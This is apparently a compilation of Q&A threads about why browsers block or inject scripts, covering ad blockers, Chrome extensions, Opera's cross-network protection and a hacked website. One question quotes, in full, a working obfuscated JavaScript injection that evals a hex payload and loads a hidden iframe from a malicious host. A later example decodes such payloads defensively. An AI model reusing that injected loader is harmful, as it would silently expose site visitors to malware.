This ain't no spam, the actual website I'm working on (sorry, it's in Latvian).
The problem here is that there is a tracking script provided by AdForm, which Chrome does not want to load. Firefox loads it smoothly. Have not checked with other browsers though.
Since the script is external, I cannot think of a way to debug it.
Has anyone experienced such a problem with Chrome and how do I fix this?
The script is right before the closing <head> tag.
Update
As Blender has suggested, I've tried removing the async parameter before, but to no avail.
You most likely have the AdBlock extension (or some similar one) installed. If I disable AdBlock the script loads just fine in Google Chrome. With it activated, the script gets blocked.
Update
The AdBlock extension (both the Google Chrome and Firefox versions) uses EasyList, which is a list of adserver domains. Any files loaded from these domains are getting blocked by the extension, and adform.net, the domain your external JS file resides on, is on the list (do a CTRL+F for it).
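To check from the developer side whether a script URL would be caught by a domain rule of this kind, the matching can be reproduced in a few lines. This is an added example, not code from AdBlock or from the original posts; the rule list is constructed in Adblock-style filter syntax rather than copied from EasyList, and every hostname other than adform.net is a placeholder.

```javascript
// Added example. Rules are constructed in Adblock-style filter syntax, not copied from EasyList.
const SAMPLE_RULES = [
  "! comment line",
  "||adform.net^",            // domain named in the answer above
  "||ads.example^",           // constructed
  "@@||static.ads.example^",  // constructed exception (allow) rule
];

// Keep only "||host^" rules; anything else in a real list is skipped here.
function parseRules(lines) {
  const block = [], allow = [];
  for (const raw of lines) {
    const line = raw.trim();
    if (!line || line.startsWith("!")) continue;   // blank line or comment
    const isException = line.startsWith("@@");
    const m = /^\|\|([a-z0-9.-]+)\^$/i.exec(isException ? line.slice(2) : line);
    if (m) (isException ? allow : block).push(m[1].toLowerCase());
  }
  return { block, allow };
}

// "||host^" covers the host and its subdomains, never a look-alike suffix.
function hostMatches(hostname, ruleHost) {
  return hostname === ruleHost || hostname.endsWith("." + ruleHost);
}

function wouldBlock(scriptUrl, rules) {
  let hostname;
  try {
    hostname = new URL(scriptUrl).hostname.toLowerCase();
  } catch (e) {
    return { blocked: false, rule: null }; // relative URL: no host to match
  }
  const allowed = rules.allow.find(h => hostMatches(hostname, h));
  if (allowed) return { blocked: false, rule: "@@||" + allowed + "^" };
  const hit = rules.block.find(h => hostMatches(hostname, h));
  return { blocked: Boolean(hit), rule: hit ? "||" + hit + "^" : null };
}

const RULES = parseRules(SAMPLE_RULES);
for (const url of ["https://sub.adform.net/example.js", "https://notadform.net/x.js"]) {
  console.log(url, wouldBlock(url, RULES));
}
```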
Related
I have created a chrome extension which is quite big. It relies on external frameworks as well as custom code. The extension manipulates the DOM and my fear is that it would really slow chrome down for some users especially if it is loaded on every tab.
Questions
Are chrome extensions loaded per tab?
Is there an upper or suggested limit to how big your extension should be?
Extensions downloaded by the Chrome browser upon install are subsequently run off of the local disk in order to speed up performance. If a new version of the extension is pushed online, it will be automatically downloaded in the background to any users who have the extension installed.
Answer to the second one: I don't think so.
I can only answer the first question:
Chrome extension code might be injected into a web page using a content script; you need to specify which host you want to inject the script into.
So it is not a question of whether the Chrome extension will be loaded per tab; you need to specify whether you want your extension to load per tab.
You can request the extension to load only in the web sites that you want it to load.
see content script here
I work on a web site using jQuery-1.8, and found out that a certain extension (on the CEO's laptop) is using jQuery-1.7 as a content script. This content script overwrites my script. Is there a way I can block at least some certain extensions from loading on the Chrome tab my web app is using? A meta tag maybe?
No. Unless the said extension is cooperative (that is it looks for the meta tag, or a specific URL, to disconnect itself), you have no way of disabling it.
You might find a way dependent on the extension but you'd need the extension's code to look for it.
In your specific case the problem seems to be that jQuery is overwritten. Can't you simply wrap your code in order to use the specific jQuery you need?
(function($) {
// here $ is protected :
// it has the value it had when the page was loaded
})($);
This behavior by an extension is not really acceptable, you should contact the extension developers to get it fixed. If they can't be reached, then you should request removal from the Chrome Web Store.
It seems that my website has been hacked, or an exploit was found or something, so now every time I load certain pages the following javascript and iframe get injected:
<script language="JavaScript" type="text/javascript">
B76197C940748B="pars";B76197C940748B+="eIn";B76197C940748B+="t";DCEC79103="St";DCEC79103+="ring.";DCEC79103+="fr";DCEC79103+="omC";DCEC79103+="harCo";DCEC79103+="de";function E0D7700E45C574E(A911795){var B3593798FBC66C=370;B3593798FBC66C=B3593798FBC66C-354;D086A805=eval(B76197C940748B+"(A911795,B3593798FBC66C)");return(D086A805);}function A41D3C153B9E8(E02A0){var D49C4143=940;D49C4143=D49C4143-938;var FB8E017784670AD="";for(E1709AB22C52CD=0;E1709AB22C52CD<E02A0.length;E1709AB22C52CD+=D49C4143){FB8E017784670AD+=( eval(DCEC79103+"(E0D7700E45C574E(E02A0.substr(E1709AB22C52CD,D49C4143)))"));}eval(FB8E017784670AD);}A41D3C153B9E8("69662028646F63756D656E742E636F6F6B69652E73656172636828227574626F3D382229203D3D202D3129207B0A7463707A3D646F63756D656E742E676574456C656D656E7442794964282771757A676327293B6966287463707A3D3D6E756C6C297B646F63756D656E742E777269746528273C696672616D652069643D71757A6763207372633D687474703A2F2F686F73746164732E636E207374796C653D646973706C61793A6E6F6E653E3C2F696672616D653E27293B7D0A646F63756D656E742E636F6F6B6965203D20227574626F3D383B657870697265733D53756E2C2030312D4465632D323031312030383A30303A303020474D543B706174683D2F223B7D");
</script>
<iframe id="quzgc" src="http://hostads.cn" style="display:none"></iframe>
I've updated all my passwords (of my control panel, database, ftp,... everything) and removed the malicious code on all of my pages, php files, javascript files etc... I also fixed the permissions of all my files and folders to 755. (The infected pages were set to 777).
The problem seems resolved in Internet Explorer, Firefox, Opera and Safari. Everything works fine there, and no malicious code is inserted anymore. However, when I surf to my website with Google Chrome, I get the famous "Warning: Malware detected" page telling me Google has found content of "hostads.cn", a known malicious website. Then, when I look into the source code I can indeed see that certain piece of javascript and iframe in my code.
I tried debugging my website, going over the code step by step to check where or what might be injecting the code, but I really can't find anything. And all the other browsers don't seem to suffer from it either.
Another oddity: When I "let" my pages get infected: i.e: I ignore the warning from Chrome and continue to the webpage I can indeed see the malicious code in my source. But when I download that certain page with FTP, everything looks perfectly fine...
So why is this malicious code inserted in Google Chrome alone, but not in a persistent way? And more importantly: What can I do against it?
Thanks.
Google works off a blacklist. You need to let Google know via Google Webmasters Tools that you have fixed it. I think you have removed the offending code from the site but you are still on the blacklist.
Site Health
https://support.google.com/webmasters/bin/answer.py?hl=en&answer=1624972
Request a malware review
https://support.google.com/webmasters/bin/answer.py?hl=en&answer=168328&ctx=cb&src=cb&cbid=15vfwobwt144o&cbrank=1
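The injected loader in the question rebuilds `parseInt` and `String.fromCharCode` from string fragments, converts its argument two hex digits at a time, and passes the result to `eval`. The same decoding can be done statically, without `eval`, to see what a payload of this shape would do. This is an added example, not part of the original posts; the sample payload and the host `injected.example` are constructed, and the function names are hypothetical.

```javascript
// Added example: decode a hex-pair payload WITHOUT eval() and summarize its behaviour.
function decodeHexPayload(hex) {
  const clean = hex.replace(/\s+/g, "");
  if (clean.length % 2 !== 0 || /[^0-9a-f]/i.test(clean)) {
    throw new Error("not a hex-pair string");
  }
  let out = "";
  for (let i = 0; i < clean.length; i += 2) {
    // Same arithmetic as the loader (base 16, two characters per code unit).
    out += String.fromCharCode(parseInt(clean.slice(i, i + 2), 16));
  }
  return out;
}

// Pull out the indicators an analyst cares about from the decoded source.
function summarize(source) {
  return {
    urls: [...new Set(source.match(/https?:\/\/[^\s'"<>)]+/gi) || [])],
    hiddenIframe: /<iframe[^>]*display\s*:\s*none/i.test(source),
    writesDocument: /document\.write\s*\(/.test(source),
    cookiesSet: [...source.matchAll(/document\.cookie\s*=\s*["']([^=;"']+)=/g)]
      .map(m => m[1]),
  };
}

// Constructed sample, encoded here so it runs offline; not the payload from the question.
const toHex = s =>
  [...s].map(c => c.charCodeAt(0).toString(16).padStart(2, "0")).join("");
const SAMPLE_PLAIN =
  "if(document.cookie.search(\"seen=1\")==-1){" +
  "document.write('<iframe src=http://injected.example style=display:none></iframe>');" +
  "document.cookie=\"seen=1;path=/\";}";
const SAMPLE_HEX = toHex(SAMPLE_PLAIN).toUpperCase();

console.log(summarize(decodeHexPayload(SAMPLE_HEX)));
```

Searching files and database content on the server for the strings reported in `urls` is a quicker way to find remaining copies than reading each page by eye.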
I found some strange <script/> tags on a site:
<script src="chrome-extension://lifbcibllhkdhoafpjfnlhfpfgnpldfl/document_iterator.js"></script>
<script src="chrome-extension://lifbcibllhkdhoafpjfnlhfpfgnpldfl/find_proxy.js"></script>
...
I haven't been able to find much information on this, but I highly doubt this is actually related to Google Chrome since this site in particular is still using <table>s for layout, and the source in question was retrieved with curl not a graphical web browser.
So,
What on earth is this?
What is chrome-extension://?
Why is it using lifbcibllhkdhoafpjfnlhfpfgnpldfl as a directory name?
Why is it pretending to be a valid URL to a javascript file?
Why would I need find_proxy or document_iterator?
Solved. As far as I know...
chrixian was right. It seems that only on this and a few select other pages, someone had re-saved them from Chrome's source-view with the Skype extension installed.
Thanks everyone for all your help, +1's for all! enjoy!
That is actually Skype Click to Call chrome extension.
Manage and view it using this link
chrome://extensions/?id=lifbcibllhkdhoafpjfnlhfpfgnpldfl
If you are using cURL to get the page, you're getting the HTML as it exists on the server, so I think a safe assumption would be: the author of the page initially saved the page from Chrome, he had an extension installed that inserted these script tags, and lastly he didn't remove the script tags for one reason or another before putting the page on the server.
This is added by chrome as the page loads, to inject the extension's Javascript code into the page, so it can access the HTML document.
The Skype extension causes it by inserting all kinds of junk in webpages that you visit.
Do you have the Skype browser extension installed for Chrome?
Just disable the extension.
Chrome, like Firefox, provides developers with an easy API to extend the functionality of the web browser without needing to actually download and build the browser to do so.
They also provide a robust delivery system. In Google's case, it's the Google Chrome Web Store.
Extensions are installed locally on your computer, and use long strings as directory names to reduce the risk of collisions with another extension. In other words, if you and I both named our extensions "mycoolextension", then there would be a problem if a person tried to install your extension and my extension. The long string helps prevent collisions such as this.
The chrome-extension:// protocol is used by the browser to make requests to these local resources. Chrome extensions are developed using HTML5, JavaScript, and CSS, along with an API exposed to allow the local JavaScript to perform actions it would not normally be able to do on the Internet.
When you see these in the Chrome developer tools, it's just the extension doing its thing, whatever that may be.
If you're seeing these, then you likely installed some extensions from the Chrome Web Store. To view them, go to the Tools menu and select "Extensions". This will show you a list of all installed Chrome extensions and apps.
To learn more about extension development, see the Getting Started Tutorial.
Also, as someone else mentioned, you're using the Skype Call Extension. However, an app using that directory name doesn't appear in the first page of the search results. It might be worth doing some more research to make sure you got that extension from a legitimate source, whether that be Skype or the Chrome Web Store.
If you're seeing it in Chrome developer tools for every request you make, it means it has access to all your websites, which could be benign, like if they're just making phone numbers clickable, or it could be malicious, if it's scraping your bank account info and shipping it off to some third party server. :)
It's a Chrome extension, and chrome-extension:// is a URL for extensions to address their contents via Javascript.
lifbcibllhkdhoafpjfnlhfpfgnpldfl is the unique identifier for the extension. I can't find it with a search, but apparently it might be Skype.
It's not pretending... it is a valid URL. The Javascript file is located in the extension. If you were to look on your hard drive you'd probably find that very file in the extensions folder.
The functions it's calling probably are some sort of detection used by the extension to see if it needs to enable itself.
See this for some additional information:
Checking if user has a certain extension installed
I have a page that calls a script in the header, like so:
<script type="text/javascript" src="http://www.discoverfire.net/analytics/l/a.js"></script>
(Note you will NOT be able to load this script as it is DNSd locally as a staging domain)
Very Simple.
Firefox, IE, Chrome all have no problem with this basic, square-one feature.
Opera, however, refuses to load the script. Any variables or functions in it are "undefined" and in dragonfly, the script tag is shown in the DOM, but the "Script" tab says "No script files found."
I go to google and find random pages, their external .js files seem to work just fine.
Any idea why Opera hates me? Is there a security/javascript thing I am missing?
A few things that may be relevant, but really should make no difference:
The script is on a different domain than the page.
The script is only available on my local network. The domain is DNS'd locally for staging, from outside the network it points somewhere else. Does Opera have a setting to secretly use an external DNS server?
The script works on every other browser I have.
The problem isn't in the script content. I've reduced it to a single line with an alert and it simply won't work in Opera.
Update:
OK, the problem seems to be how Opera treats the domain.
I have moved the script to several other domains, and it DOES work just fine. I've moved it to several paths on the locally DNS'd domain, and it won't work from anywhere on that domain.
This leads me to believe that the problem is that Opera can't, or won't, load the script from this domain for some reason.
Strangely, there seems to be no problem loading pages and other resources from the domain, the problem lies in .js files only.
The domain is registered, but parked. We DNS'd it locally so we can use it for staging/testing, and that may be messing with Opera somehow with JS security.
I could be wrong though - I really have no idea. If anyone else has one, I'd love to hear it.
Update 2:
Regarding Dragonfly and the error console/developer tools, they don't say anything about the script at all. There are plenty of Undefined Variable errors for variables and functions that should be present from the script, but other than that, no errors. Oddly, the script tag does show up in the DOM, but if I click on the Scripts tab, it says "No Scripts Found".
Update 3:
There is no blocked content, so we can at least rule out that setting.
You may want to see if its ad blocker is getting in the way. Your URL contains the text "analytics," which may be part of a "block this" pattern. I know some block Google analytics through Opera. An easy test for this may be to try moving your .js to a different path on the host.
Have you checked Opera's error console? Tools > Advanced > Error Console
It should provide information on why it won't load or if there is another error of some kind.
Like Jacob suggested, you should check if it isn't blocked. To do this:
Right-click on your page
Select "Block Content..." in the context menu
At the top of the screen, click the "Details..." button
You should see the URLs that are blocked on the current page
You should ask in the Opera Forums. I had some problems with Opera in the past and they answered quickly.
Is the host serving the correct mime type of the JavaScript file? It's not a commonly known fact but the type=text/javascript attribute is actually ignored by browsers as it trusts that the server is specifying the correct type.
Additionally the mime type of text/javascript is actually wrong when it comes to JavaScript, the actual JavaScript mime type is application/ecmascript (if I recall correctly, it may be application/javascript though). If you don't believe me you should have a look here where I had more information and linked off to the Douglas Crockford's videos where he discussed the mime type.
I had something similar recently - Opera would just not run a script on an external server... nor if I downloaded it and had it on localhost. It only ran when copy/pasted between script tags into the html page.
It turned out that the script was encoded with UTF-16 and that was somehow confusing the browser. When I converted it to UTF-8, everything ran fine.
So, just in case and if you still have that problem, check out the encoding settings...
I had the exact same issue, trying to load a script from a localhost/development server into a page, hosted on the public server, to no avail. The only way I managed the script to load in Opera was to save a copy of the page into a location on the same development server and use the tag to refer to the original domain to get the page's .css and .js linked files. That worked. Looks like Opera doesn't like to mix public and localhost domains, but handles localhost without complaints.
What you're seeing is probably Opera's security precaution against the so-called "phish pharm" attacks: cross-network protection. You cannot mix content from a public server and content from a local server.
Have a look at my answer here for a workaround:
Opera won't load some JavaScript files